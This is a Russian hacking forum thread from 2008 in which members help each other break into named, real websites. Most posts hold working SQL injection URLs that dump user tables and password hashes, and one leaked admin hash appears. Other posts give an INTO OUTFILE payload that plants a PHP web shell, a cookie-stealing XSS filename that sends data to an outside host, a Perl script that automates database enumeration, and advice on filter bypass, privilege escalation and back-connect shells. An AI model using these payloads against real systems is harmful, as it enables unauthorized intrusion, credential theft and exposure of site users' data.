Была найдена такая уязвимость: на одном варез сайте есть такой сервис, что если к адресу сайта подписать такое: site.ru/?site=ваш_сайт (без HTTP://), то на всех страницах сайта будет ссылка внизу страницы на ваш_сайт! Попробова ввести такой URL вида site.ru/fol/?list="><script>alert()</script> - выскакивает аларм )) попробовал ввести в URL php код - не прлучилось, вопросительные знаки режутся. Пробовал в разных кодировках - все бестолку. Но кроме знака вопроса больше ничего не режется! Вопрос собственно такой: как еще можно навредить сайту через эту уязвимость если сайт НЕ поддерживает куки? Там вообще даже нету регистрации юзеров.

sasha008
29.04.2008, 18:13
Где можно раздобыть хорошую прогу для взлома емейла и плюс хороший словарь?

neon_fx
29.04.2008, 22:58
Блин нифига понять немогу

есть скуль такого вида
danko.dn.ua/news.php?id=-17+union+select+1,'<?%20system($_GET[''cmd''])%20?>',3+from+mysql.user+into+outfile+''/usr/local/www/data/admin/fckeditor/_samples/php/gif.php/'

пишет Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /usr/local/www/data/news.php

ver-5.1.22-rc
user-root@localhost

http://danko.dn.ua/admin/fckeditor/_samples/php/

Scipio
29.04.2008, 23:23
даже после нормальной заливки шелла может возвращаться ошибка, и еще лучше шелл закодировать в hex, и точно кавычки не экранируются?
возможно нет прав/файл существует, вобщем по тем данным что ты дал, одназначно не скажешь

maxster
30.04.2008, 02:39
Блин нифига понять немогу

есть скуль такого вида
danko.dn.ua/news.php?id=-17+union+select+1,'<?%20system($_GET[''cmd''])%20?>',3+from+mysql.user+into+outfile+''/usr/local/www/data/admin/fckeditor/_samples/php/gif.php/'

пишет Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /usr/local/www/data/news.php

ver-5.1.22-rc
user-root@localhost

http://danko.dn.ua/admin/fckeditor/_samples/php/

попробуй LOAD_FILE если не катит, попробуй в хекс закодировать путь до файла, если опять не катит, значит file_priv отключен, тогда забей, если все ок, то шелл в хекс и заливай.

neon_fx
30.04.2008, 03:45
LOAD_FILE есть
file_priv -ок
и шелл кодировать пробовал

буду пробовать залить в базу а потом из базы в файл

Kuzya
30.04.2008, 07:55
Скажите плиз где можно почитать про SSI-уязвимости (Server Side Include)

n0ne
30.04.2008, 09:42
Kuzya, _ttp://www.citforum.ru/internet/html/ssi.shtml и http://ru.wikipedia.org/wiki/SSI_(%D0%BF%D1%80%D0%BE%D0%B3%D1%80%D0%B0%D0%BC%D0 %BC%D0%B8%D1%80%D0%BE%D0%B2%D0%B0%D0%BD%D0%B8%D0%B 5)

-=megahertz=-
30.04.2008, 14:03
кто подскажет как это реализовать?

Удаленный пользователь может представить специально обработанный авторизационный пакет, чтобы обойти механизм авторизации на MySQL сервере. Уязвимость расположена в check_scramble_323() функции.

Велемир
30.04.2008, 17:16
POST /index.php?id=211 HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: www.energia.ee
Content-Length: 282
Connection: Close
Pragma: no-cache
Acunetix-Product: WVS/5.5 (Acunetix Web Vulnerability Scanner - NORMAL)
Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED
Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm

html_enabled=1&subject=Elektritarne%20pakkumine%20L%C3%A4tis%20v% C3%B5i%20Leedus&locationData=979%3Att_content%3A3514&Ettev%C3%B5te="+or+1%3D1+--+&Kontaktisik=111-222-1933email@address.tst&Telefon=111-222-1933email@address.tst&Epost=111-222-1933email@address.tst&formtype_mail=Saada

Орёт,что скуля. Пробывал постами меняя параметры заставить отреагировать серв,но ему поф даже на 1+and+0=0 и 1+and+1=1

Менял параметры, как только мог. Есть тут инжект или нету?

n0ne
30.04.2008, 17:36
но ему поф даже на 1+and+0=0 и 1+and+1=1

Что ты хотел этим сказать? 0_о

Велемир
30.04.2008, 18:21
Что ты хотел этим сказать? 0_о


моя хотело сказать,что ему абсолютно ПОФ,тобишь он возвращает одинаковый результат,обрезает чели,потому что при смени ид меняется только страница )),а запросы он как будто ваще не видит: )

-=megahertz=-
30.04.2008, 18:45
по моему правильнее было так сделать =1+1 или =2-1 если страница та же то инжекта нет...

Sh..)
30.04.2008, 19:19
при подключение через mstsc.exe пишет Эудалённые подключения запрещены"
как запустить? есть шелл на удалённой системе к которой произвожу коннэкт.
права system

n0ne
30.04.2008, 19:33
Велемир, а ты не думал, что 0 всегда равен нулю, как и 1 всегда будет равна самой себе?)) ты бы попробовал 1=2 и делал выводы. Ещё попробуй к id -1 подставлять и т.п.

.acme
30.04.2008, 19:35
http://www.rosprom.gov.ru/oorg.php?id=-13+or+1=concat_ws(0x2,user(),database(),version())--

Я так понял, что с этого ничего нельзя поиметь?

Indio
30.04.2008, 20:03
всем привет
частенько сталкиваюсь с извлечением большого количество данных из баз данных.
можно ли как-нибудь начать извлекать данные начиная к примеру с 20.000'ой записи?

К примеру:
Имеем дейтинг-сайт с логинами/пассами/мылами на 20к пользователей. В месяц региться ещё порядка 1к. Можно ли определённым запросом вывести на эран инфу начиная с 20.000? Чтобы не качать заново всю информацию полностью?

Спасибо всем ответившим =)

Scipio
30.04.2008, 20:05
.acme
при обращении к скрипту http://www.rosprom.gov.ru/oorg.php
в куки прописывай id=-999 union select 1,2,3,4,5/*

neon_fx
30.04.2008, 20:07
всем привет
частенько сталкиваюсь с извлечением большого количество данных из баз данных.
можно ли как-нибудь начать извлекать данные начиная к примеру с 20.000'ой записи?

К примеру:
Имеем дейтинг-сайт с логинами/пассами/мылами на 20к пользователей. В месяц региться ещё порядка 1к. Можно ли определённым запросом вывести на эран инфу начиная с 20.000? Чтобы не качать заново всю информацию полностью?

Спасибо всем ответившим =)

Пользуйся лимитом (LIMIT 20000,100) к примеру

Scipio
30.04.2008, 20:22
Indio какая СУБД интересует?
MSSQL: select TOP n column from table where column>'чето'
MYSQL: select column from table limit 20000,10
SYBASE: select TOP n START AT 20000 column from table
PostgreSQL: select column from table LIMIT 10 OFFSET 20000

Велемир
30.04.2008, 22:23
Со скулей походу ниче не вышло,аблом =_=

Вот второй день уже маюсь,дошёл вот :

http://robinzonada.ru/news/index.asp?id=1+or+1=(select+top+1+table_name+from+ information_schema.tables+where+table_name+not+in+ (0x276C6F67696E27,0x27647470726F7065727469657327))--

Почему дальше не идёт,не ужели всего две таблицы ?))

Scipio
30.04.2008, 22:52
http://robinzonada.ru/news/index.asp?id=1+or+1=(select+all+top+1+table_name+f rom+information_schema.tables+where+table_name+not +in+((select+all+top+1+table_name+from+information _schema.tables)))--
http://robinzonada.ru/news/index.asp?id=1+or+1=(select+all+top+1+table_name+f rom+information_schema.tables+where+table_name+not +in+((select+all+top+2+table_name+from+information _schema.tables)))--
меняй число после top во втором подзапросе (который внутри where+table_name+not+in)

Велемир
01.05.2008, 00:19
Пасип те большое))).И откуда ты только эти подзапросы откопал:Р

Constantine
01.05.2008, 00:31
из манов, которые тебе давно пора начать читать

Велемир
01.05.2008, 15:55
Я прочитал почти всё что только можно прочитать: (и маны читал по сто раз

На100ящий
02.05.2008, 14:36
Подскажите кто нибудь:
Система UNIX.
В httpd.conf прописано:
<VirtualHost *>
ServerAdmin webmaster@site.com
DocumentRoot /www/htdocs/rail
ServerName www.site.com
# ServerAlias 10.7.103.250
ServerAlias 10.7.100.4
ErrorLog /var/log/apache/railway.log
CustomLog /var/log/apache/railway.log common
</VirtualHost>

Дальше нужно записать файл в директорию /www/htdocs/rail:
www.site.com/index=4&number=1'+union+select+1,2,3,convert(текст+us ing+c p1251)+from+mysql.user+into+outfile+"\\www\\htdocs\\rail\\1.txt"/*

Вроде записалось, проверяем:
www.site.com/1.txt и нифига не получилось... Кто скажет почему???

Vid0k
02.05.2008, 21:03
нашел на сатйте бажный скрипт даунлоада фалов
скачал /etc/passwd все прошло норм
поробовал /etc/shadow
а он мне выдает вот эту шянягу http://slil.ru/25750274 что это может быть???

n0ne
02.05.2008, 21:05
На100ящий, скорее всего, просто нет прав на запись в корень. Ищи папки с правами на запись.

Vid0k, не качал что там по ссылке, но предполагаю что тоже не хватает прав. На /etc/shadow права имеет только root, если систему ставили без кардинальных изменений :)

Vid0k
02.05.2008, 21:09
что можно еще попробовать нарыть
уже скачал error_log
httpd.conf
httpd-autoindex.conf
httpd-info.conf
httpd-mpm.conf
httpd-ssl.conf
httpd-vhosts.conf
ток ничо дельного не нашел ток юзерские диры
пытался скачать конфиг phpmyadmin но не выходит пишет мол ошибка
сам весь сайт на хтмл + пара скриптов на пхп
версия phpmyadmin 2.11.4

xcedz
02.05.2008, 21:12
оО пездец полюбому черная магия, юзай читы
ты не понимаешь ничего.
предупреждения не воздействуют.

n0ne
03.05.2008, 02:54
Vid0k, поищи конфиги, мож там форум какой стоит или гест бук.

Vid0k
03.05.2008, 04:33
Vid0k, поищи конфиги, мож там форум какой стоит или гест бук.
уже нашел конфиги для db логин и пасс подошли к phpmyadmin
права там урезаны пытался залить шелл через вывод таблицы в файл не дали)
в админке сайта нету даже где залить файл попробую
отредактировать шабон index может пропишу простейший шел а там уже посмотрю

samarin
03.05.2008, 14:25
Подскажите, что можно сделать в случае если, база данных 4.1.22-standard, установлен форум, но стандартный префикс в таблицах по идее изменен. Каким образом тогда можно узнать названия этого самого префикса, чтобы получить пароль админа?
----------------------------------
брут не предлогать-помоему это не реально

Лигендо Онтечада
03.05.2008, 14:32
Вызови какую-нить ошибку mysql, чтоб она выплюнула название таблицы

vampir3a
05.05.2008, 10:18
Всем привет , сканернул сайт и нашёл крит уязвимость

Unfiltered Header Injection in Apache
This version of Apache is vulnerable to HTML injection (including malicious Javascript code) through "Expect" header. Until not it was not classed as security vulnerability as an attacker has no way to influence the Expect header a victim will send to a target site. However, according to Amit Klein's paper: "Forging HTTP request headers with Flash" there is a working cross site scripting (XSS) attack against Apache 1.3.34, 2.0.57 and 2.2.1 (as long as the client browser is IE or Firefox, and it supports Flash 6/7+).

Нашёл описание тут http://www.securityfocus.com/archive/1/433280
но так и не понял как ей пользоватся так же скрипт показывает <script>alert(39582,41865125)</script>

: ( подскажите пожалуйста что и как ... ?

Велемир
05.05.2008, 16:51
Всё прально, вместо цифр ставь текст : alert(/gagaga/) или alert(135)

Про XSS тут дофига статей, пофтыкай побольше.Если те нужен перевод, пиши на 292-514-125 : )

Велемир
05.05.2008, 17:05
Ой мля,ступил ппц.Это атака через хттр заголовок Expect.Для этого надо создать объект и послать,лично не пробывал:Р.Прост этот торч надеется на то, что через ие и файрфокс так сделать нельзя(и правильно делает),но через объекты мона.

Jokester
05.05.2008, 17:42
Ой мля,ступил ппц.Это атака через хттр заголовок Expect.Для этого надо создать объект и послать,лично не пробывал:Р.Прост этот торч надеется на то, что через ие и файрфокс так сделать нельзя(и правильно делает),но через объекты мона.
Послушай, юноша, за каким хреном писать такой бред?
vampir3a
Вот немного об уязвимости на русском, но не особо обольщайся, сканер нашёл это не значит ,что получится использовать
_http://www.securitylab.ru/analytics/271169.php

+r0ot?r+
05.05.2008, 19:48
1.Есть форум, Powered by SMF 1.1.x,как узнать х?
2.Надеясь на удачу(что версия <=1.1.4), пробую приаттачить файл со следующим названием:
abc<img src= .width=1 height=1 onerror=javascriptnew Image().src='http//s.netsec.ru/arm.gif'+document.cookie>.txt

Но выдаётся ошибка:

default.htm.
Вы не можете отправить этот файл. Доступны только следующие типы файлов doc,gif,jpg,mpg,pdf,png,txt,zip.

samarin
05.05.2008, 22:27
Подскажите это уязвимость или нет?

http://www.intone.ru/get2.php?partner=269&id=89596/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29/*
помоему да, т.к при таком запросе не происходит редирект на главную страницу. Но ни одно из полей не выводится :(
---------------------------------------
Извиняюсь сплоховал, менял значения в partner :)
Спасибо ZAMUT!!!

ZAMUT
05.05.2008, 22:44
samarin, просто замени на несуществующее значение id, -1 к примеру. Вывод есть.

AFoST
06.05.2008, 17:16
или
http://www.intone.ru/get2.php?partner=269&id=89596/**/and/**/1=0/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29/*

samarin
06.05.2008, 19:09
Вывод то есть, а каким образом вывести что нибудь интересное? ведь доступа к information_schema нету, и намека, хоть на какое-то название таблиц тоже.
Довольно интересный случай (я только учусь и такого еще не встречал).

ZAMUT
06.05.2008, 19:16
фильтруется from

groundhog
06.05.2008, 19:26
Там походу фильтры Get-post переменных стоят, ибо как что нормальное в инъекцию прописываешь аля Information_schema.tables, то выдаёт такую байду: "Ваш запрос отвергнут по причине его возможной небезопасности". Хотя классический Union+select даёт вывод в страницу...

ZAMUT
06.05.2008, 19:29
все верно, фильтрация идет при Get/post запросах.

Велемир
06.05.2008, 20:04
а через куки? )

AFoST
06.05.2008, 22:02
попробуй закодировать в %20%40%xx у меня раз был случай когда так прокатывало, а чистый запрос отвергало.

Велемир
06.05.2008, 23:31
Чойто за 20 40 :РР. Я где-то читал,что мона попробывать передать гет переменные постом и наоборот:Р. Вродь катит.. )А ф топку такие замуты )

AFoST
06.05.2008, 23:59
Велемир http://ha.ckers.org/xss.html внизу страницы можно перекодировать :)

Piflit
07.05.2008, 00:22
Чойто за 20 40 :РР.
url encoding

samarin
07.05.2008, 12:33
Всем конечно спасибо за то что откликнулись, но url encoding не катит.
сообщение от ZAMUT
фильтруется from
У меня не получилось обойти-может что то посоветуешь?
-----------------------------------------------------------
Возможно ли вытащить что-то интересное? если не возможно, так и скажите, чтобы я голову зря не ламал :)

goror
07.05.2008, 12:58
фильтруется from


Там не from фильтруется, а последовательность
union select from.

goror
07.05.2008, 13:02
Всем конечно спасибо за то что откликнулись, но url encoding не катит.

У меня не получилось обойти-может что то посоветуешь?
-----------------------------------------------------------
Возможно ли вытащить что-то интересное? если не возможно, так и скажите, чтобы я голову зря не ламал :)

На первый взгляд ничего интересного.
Таблицы clocks,blogtext, blogsfree,freemp3,freepics

Есть таблица jgamesru_int.partners с полями

name,login,pass

+r0ot?r+
07.05.2008, 14:03
Warning: mysql_data_seek(): supplied argument is not a valid MySQL result resource in {url} on line 60*

MySQL плюется данной ошибкой,как дальше ломать?При подборе кол-ва полей такого же рода ошибки.

Spyder
07.05.2008, 14:05
ссылку то кинешь или тебе на руке погадать?

samarin
07.05.2008, 14:35
сообщение от goror
На первый взгляд ничего интересного.
Таблицы clocks,blogtext, blogsfree,freemp3,freepics

Есть таблица jgamesru_int.partners с полями

name,login,pass

Мне в этом примере интересен сам процесс. Как обошел?

Велемир
07.05.2008, 15:29
Спс что ответили Вельке :Р

Zergius
07.05.2008, 18:30
У мну вопрос по SQL (сразу в эту (http://forum.antichat.ru/thread19844.html) тему не пинать.
Я нашел "xspider"ом дыру вот такого типа http://www.site.ru/forum/index.php?showforum=2&prune_day=100&sort_by=Z-A&sort_key=last_post&category1=1'&st=25
Выдает
mySQL query error: SELECT COUNT(tid) as max FROM ibf_topics WHERE forum_id=2 and approved=1 and (pinned=1 or last_post > 0) AND category1=1'

mySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
mySQL error code:
Date: Wednesday 07th of May 2008 05:52:48 PM
Че с этим добром делать, мне не понятно =((
Просьба помочь...

n0ne
07.05.2008, 18:57
Zergius, прочитать пару статей по SQL-инъекциям. Их тут очень много, можно даже поиск не юзать, просто зайти в раздел "Статьи". Там всё подробно расписано.

з.ы. https://forum.antichat.ru/thread19605.html вот :)

з.з.ы. Если тебе интересно зачем это вообще надо - ну много вариантов: шелл залить, инфу вытащить (базу мыл, пассы и т.п.), заддосить..

diznt
07.05.2008, 21:06
Помогите со sql иньекцией сам ковырял не получилось http://hhunt.ru/comments.php?news_id=9999+union+select+1,2,3,4,5,6 ,7,8,9,10,11,12,13,14/*
Читал статью тоже так же ниче не получилось

Zergius
07.05.2008, 21:14
Просто я ни в одной статье такого не вижу, а насчет инфы-это извесный сайт по фотошопу, как пойму как вытащить инфу(учиться как то надо), так админу думаю расскажу...
Млин, все равно не догоняю =(((

ElteRUS
07.05.2008, 21:16
hhunt.ru/comments.php?news_id=9999+union+select+1,2,3,4,5,c oncat_ws(0x2F,version(),database(),user()),7,8,9,1 0,11,12,13,14/*
4.1.22-log/hhuntru4_apeha/hhuntru4_user2@localhost

Доступа к information_schema нет. К форуму (phpbb) - тоже. Можешь попробовать подбирать названия таблиц вручную. Типа там users, members и тд.

Piflit
07.05.2008, 21:18
Помогите со sql иньекцией сам ковырял не получилось http://hhunt.ru/comments.php?news_id=9999+union+select+1,2,3,4,5,6 ,7,8,9,10,11,12,13,14/*
Читал статью тоже так же ниче не получилось
f5

diznt
07.05.2008, 21:19
4.1.22-log/hhuntru4_apeha/hhuntru4_user2@localhost да это я сам знаю
А как есть какой нибуть автоподбор или чтото в этом роде просто подбирать это долго и мучительно((

ElteRUS
07.05.2008, 21:24
4.1.22-log/hhuntru4_apeha/hhuntru4_user2@localhost да это я сам знаю
А как есть какой нибуть автоподбор или чтото в этом роде просто подбирать это долго и мучительно((

Есть проги типа SQL Injection Tool от SQLHACK. Там если я не ошибаюсь можно организовать автоподбор. А вообще где-то тут была тема часто юзаемых имен для таблиц и колумнов. Поищи и проверь если хочешь.

Zergius, дай ссылку на сайт. На пальцах никто ничего не объяснит.

diznt
07.05.2008, 22:01
ООООООО МДЯЯЯЯ ВОТЬ ЭТО УЖЕ РЕАЛЬНЫЙ ППЦ)))))))) (p.s. наврятли чтото получиться имхо хотя не кто не знает что произойдет)
Сор за капс

Sharingan
07.05.2008, 23:32
Вот такое дело, был сайт на нем висел шелл долго, были права на редактирование индекса, потом админ убрал права на запись, какие есть возможные способы поднять права?

diznt
07.05.2008, 23:42
Zergius не волнуйся у мя такая же трабла со школьным сайтом((

criz
07.05.2008, 23:44
какие есть возможные способы поднять права?
Можно узнать пасс админа и права поднимутся :)
Заюзать сплойтенг, которые сделает тебя рутом =)

Sharingan
07.05.2008, 23:47
мне нужно именно знать какие есть сплойты, какая инфа нужна для того что бы проверить реально ли воспользоватся данным сплойтом, просто хочу что бы все было быстро и оперативно.

criz
07.05.2008, 23:51
Sharingan, знаешь какая ОС? :)
Можно поискать под конкретную версию + сплоит под сервисы, которые крутятся на машине

Sharingan
07.05.2008, 23:59
FreeBSD 6.2-RELEASE-p5
Server: Apache
safe_mode: OFF PHP version: 4.4.7 cURL: ON MySQL: ON MSSQL: OFF PostgreSQL: OFF Oracle: OFF
если на таком шелл стоит реально ли права поднять?

criz
08.05.2008, 00:04
Сейф мода нет...дас ист гут :)
Вот, поищи тут:
http://milw0rm.org/search.php
Лучше в поиск вбивать названия демонов :)

samarin
08.05.2008, 00:07
Кто нибудь подскажет как обойти фильтр последовательности union select from?
----------------------------------
https://forum.antichat.ru/thread56409-sweb.html читал, но вопрос остался

vampir3a
08.05.2008, 01:11
Hi All
Такой вопрос зашёл в админку Coppermine Photo Gallery через куку админа такой вопрос как лучше залить шел ? заранее спасибо !!!

http://forum.antichat.ru/threadnav59410-1-10-Coppermine%2BPhoto%2BGallery.html

Sharingan
08.05.2008, 23:56
касательно сообщение #1921 так и не нашел сплойта, может кто что посоветует ?

diznt
10.05.2008, 02:27
кароче я все подставил как мне человнк подсказал и получилось)) вот что получилось http://r-est.biz/?r=nj&n=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,usr_emai l,usr_psw,15,16,usr_id,18+from+users+limit+1,1/*

Собственно я сразу побежал в админку http://r-est.biz/admin вроде как не получилось войти (катогория админки не та вроде как) кароче я решил ломануть ихний phpbb форум. подставил все вроде правильно но чето не высвечиваеться пароли((

http://r-est.biz/?r=nj&n=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,username ,user_password,15,16,user_id,18+from+phpbb_users+l imit+1,1/*

вот колонки phpbb

http://r-est.biz/?r=nj&n=24+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,column_name,18+from+information_schema.colu mns+where+table_name=0x70687062625f7573657273+limi t+1,100/*

Подскажите если не трудно

sabe
10.05.2008, 05:33
diznt
не трудно..)

http://r-est.biz/?r=nj&n=-http://r-est.biz/?r=nj&n=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,table_schema+from+Information_schema.tables +where+table_name=%200x70687062625f7573657273+limi t+0,1/*

http://r-est.biz/?r=nj&n=-1+union+select+null,null,null,null,null,null,null, null,null,null,null,null,concat(user_id,0x3a,usern ame,0x3a,user_password),null,null,null,null,null+f rom+restbi_bb.phpbb_users/*

admin;e816c860394f9fb51eed8d902a569e5d

diznt
10.05.2008, 12:02
точно там же concat)) блогадарю

Macro
10.05.2008, 12:37
касательно сообщение #1921 так и не нашел сплойта, может кто что посоветует ?
Порутать данную тачку нечем. Паблик эксплойтов нет, приватных не видел

diznt
10.05.2008, 22:10
http://www.vturs.ru/index.php?mod=view&id=-1+union+select+1,table_name,3,4,5,6,7,8,9+from+inf ormation_schema.tables+limit+1,2/*
Как быстрее выявить таблицы? а то меняя значения лимита это занудно и долго

ElteRUS
10.05.2008, 22:25
http://www.vturs.ru/index.php?mod=view&id=-1+union+select+1,table_name,3,4,5,6,7,8,9+from+inf ormation_schema.tables+limit+1,2/*
Как быстрее выявить таблицы? а то меняя значения лимита это занудно и долго

http://www.vturs.ru/index.php?mod=view&id=-1+union+select+1,concat(username,0x3a,user_passwor d,0x3a,user_icq),3,4,5,6,7,8,9+from+phpbb_users+li mit+1,1/*

юзеры форума. Если на сайте есть форум, значит можно попытать залезть а таблицу его юзеров. Для пхпбб эта таблица как правило имеет название phpbb_users.

А вобще используй запрос типа такого http://www.site.ru/index.php?id=-1+union+select+1,table_name,3,4,5,6,7,8,9+from+inf ormation_schema.columns+where+column_name='passwor d'/*

Ты получаешь все таблицы, где есть колумн password. Можно вместо ='password' использовать функцию char()

S00pY
10.05.2008, 22:26
http://www.vturs.ru/index.php?mod=view&id=-1+union+select+1,table_name,3,4,5,6,7,8,9+from+inf ormation_schema.tables+limit+1,2/*
Как быстрее выявить таблицы? а то меняя значения лимита это занудно и долго
Напиши скрипт(например на пхп)который будит будит подставлять значения лимита за тебя и собирать результат в тхт (где-то видел такой,помоему на грабберз.ком )
ЗЫ:Первые 17 значений - системные таблы!

Gorev
10.05.2008, 22:50
2 diznt ...ves' kaif lomae6.... uznavat' tables i columns v udovol'stvie.ili ti postavil na promishlennii ma6tab vzlomi 4erez sql.Kud anarod katitsea :))) nikakoi romantiki uje...vse na avtomatiku prutsea..skoro v detskom sadike deti budut progoi ustanovlenoi v tetris serveri lomat' :))) uda4i vam vsem v va6em nelegkom trude....

Doom123
11.05.2008, 08:15
знаю что нет но всётаки решил спрсить.... в mssql иньекции никак не выдернуить данные из другой бд?

aka PSIH
11.05.2008, 09:09
xcedz
откуда в mssql - load_file() взялся?

в mssql иньекции никак не выдернуить данные из другой бд?
Что ты подразумеваешь под другой БД?

select ColumnName from DBname.TableName ???

имена бд на сервере можно так посматреть:
Select schema_name from information_schema.schemata

если ты конечно про это...

xcedz
11.05.2008, 09:14
xcedz
откуда в mssql - load_file() взялся?


:D блин не внимательно посмотрел.
==
а можно так:
SELECT name FROM master..sysdatabases;
SELECT DB_NAME(N); -- for N = 0, 1, 2, ...


http://msdn.microsoft.com/en-us/library/bb545450.aspx
тогда для текущей базы:
----------------------------------------
SELECT sysobjects.name as tablename, syscolumns.name as columnname FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = 'U' AND syscolumns.name LIKE '%PASSWORD%' --

h==p://pentestmonkey.net/blog/mssql-sql-injection-cheat-sheet/

Doom123
11.05.2008, 15:28
Нет ... я знаю имена всех БД

например сейчас есть подключение с БД test1 а на сервре через
SELECT DB_NAME(N) я просмотрел все БД например test1,test2,test3
можно ли выташить данные из test2?

aka PSIH
11.05.2008, 15:30
если прав хватит

>select ColumnName from test2.TableName

.Slip
11.05.2008, 18:23
Как быстрее выявить таблицы? а то меняя значения лимита это занудно и долго
#!/usr/bin/perl

use LWP::UserAgent;

$ua = LWP::UserAgent->new;

$x=0;
$y = $ARGV[0];
open(TT,">","mda.txt") or die "$!";
while ($x<=$y)
{
my $omfg = $ua->get("[СКУЛЬ ТУТ")->content;
$omfg =~m%###(.*?)###%i;
my $table = $1;
print TT $x,":",$table, "\n";
$x++;
}
close TT;

Сначало узнаёшь общее кол-во таблиц/колонок, count(table_name) from information_shema.tables/columns

Дальше в скрипт вписываешь скуль в таком виде:
http://site.ru/index.php?id=-1+union+select+1,2,3,concat(0x232323,table_name,0x 232323),4,5+from+information_schema.tables+limit+$ x,1--

Запуск:

perl script.pl 23

где 23 - общее кол-во таблиц/колонок. Скрипт впринципе можно переделать хоть подо что.

Многотредовую версию с поддержкой проксей не выкладываю, ибо нех:\

Piflit
11.05.2008, 18:27
еще разок
http://forum.antichat.ru/thread60802.html

samarin
11.05.2008, 18:35
Растолкуйте мне непонятливому кто нибудь как работает этот эксплоит. А то я что-то в нем запутался :)
http://www.securitylab.ru/bitrix/exturl.php?goto=%2Fpoc%2Fextra%2F351739.php
а точнее какую ссылку он создает. Хотелось бы потренироваться вручную проводить такие иньекты. Да и на будующее пригодиться :)
пробовал на localhost-e но получил в отчетах бред
a:4:{s:13:"link_category";s:1:"1";s:9:"link_name";s:1:"1";s:8:"link_url";s:1:"1";s:16:"link_description";s:1:"1";}

aka PSIH
11.05.2008, 18:40
там же все написано


Host: 127.0.0.1

POST PHP-Fusion/submit.php?stype=l

link_category=1 link_name=1 link_url=1 link_description=1 submit_info[paradox]=' submit_link=1

samarin
11.05.2008, 18:47
я это видел. Но когда я пытался составить запрос вручную, меня кидало на главную стр. Приведи please рабочую ссылку, а я от нее буду отталкиваться дальше

ElteRUS
11.05.2008, 19:40
samarin, это POST запрос :) submit.php запускается когда ты хочешь что-либо добавить на сайт (ссылку, картинку, новость, статью - это как правило доступно только зарегистрированным пользователям сайта). Допустим это ссылка, тогда ты видишь перед собой форму добавления новой ссылки, куда надо вписать категорию ссылки (link_category), имя (link_name), урл (link_url) и описание (link_description - здесь и есть скуля), после этого ты нажимаешь "Отправить ссылку" и браузер отправляет POST запрос, например на сайте 1С 1cnastole.info он будет выглядеть к примеру так:


POST /submit.php?stype=l HTTP/1.1
Host: 1cnastole.info
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://1cnastole.info/submit.php?stype=l
Cookie: fusion_visited=yes; fusion_user=211.b111406bc3sdfgs1cf532bfcc68d8d; fusion_lastvisit=1123123
Content-Type: application/x-www-form-urlencoded
Content-Length: 216
link_category=1%D1%3A%D4%F0%E0%ED%F7%E0%E9%E7%E8&link_name=%CD%E5%F2%EE&link_url=http%3A%2F%2Fqwer.ru&link_description=%F3%E4%E0%EB%E8%F2%E5+%EF%EB%E8%E 7+%29&submit_link=%CE%F2%EF%F0%E0%E2%E8%F2%FC+%F1%F1%FB% EB%EA%F3


Результат увидишь когда ссылка добавится на сайт. (в эксплоите написано где именно).

samarin
11.05.2008, 22:38
Существуют ли какие-то плагины для создания(редактирования) пост запросов в опере?
-------------------------------------
и подкиньте полезные ссылки где можно почитать по работе с пост запросами

AFoST
11.05.2008, 22:51
Связка InetCrack(для отправления запросов) + Naviscope(для отлова отправленных на любой сервер запросов). Но сначала внимательно прочитай про протокол HTTP.

delay(0)
12.05.2008, 01:35
Microsoft JET Database Engine error '80004005'

Syntax error in FROM clause.
http://www.../links/default.asp?id=1+union+select+1+from+user
В чем дело?

geezer.code
12.05.2008, 13:22
http://www.*****.ru/shop/pollbooth.php?op=results&pollid=-6+union+select+9999/*
Есть такая инъекция...выводит 9999....но когда я заменяю 9999 допустим на version() и т.д.
Сразу выдает ошибку и ничего не выводит...из за чего это может быть и как сделать что б нормально выводило?
скорее всего штото там с коллейтами или типа того
обходится aes_decrypt(aes_encrypt(vesion(),0xaa),0xaa)

truelamer
12.05.2008, 17:22
Скажите мне пожалуйста:
1) когда я делаю иньекцию то мои ошибочные запросы пишутся в лог???
2) что на свой сайт можно поставить чтоб тоже палить попытки взлома?
3) правда что Post запросы не палятся?
4) чем их посылать? и в каком виде будет приходить ответ?

a1ex
12.05.2008, 17:27
to truelamer

Всё имхо:

1)да.
2) ---
3) да.
4) ---

n0ne
12.05.2008, 19:38
truelamer,

2) Смотря на что ставить

4) InetCrack или любая подобная прога (скачать можно на old.antichat.ru в разделе прог, что в правой колонке)

blackybr
12.05.2008, 19:51
3) правда что Post запросы не палятся?

смотря какой сервак. если на апаче, то есть по меньшей мере 1 модуль который умеет палить пост запросы mod_security

если у нас iis >6 (6 или 7) то он по дэфолту палит и гет и пост запросы.

на nginx не видел ничего такого. _вроде_ не палит

Doom123
13.05.2008, 20:51
сорь не знал куда постит свой нубский вопрос... видел видео где через шел рст паренёк сделал бакконект и у него коммандная строка оказалась в putty (Знаю тупо обьеснил) так вот как и куда делать бекконект чтоб потом управлять командной строкой через putty?

criz
13.05.2008, 21:32
Бэкконект - это когда сервер коннектится к тебе, а не ты к серву. Для этого нужен nc, для открытия и прослушки порта.
А Путти юзается чаще всего при использовании биндшеллов...
Вотъ :)
P.S. для бэкконекта нужен внешний IP :)

geezer.code
13.05.2008, 21:37
для бэкконекта нужен стат. IP
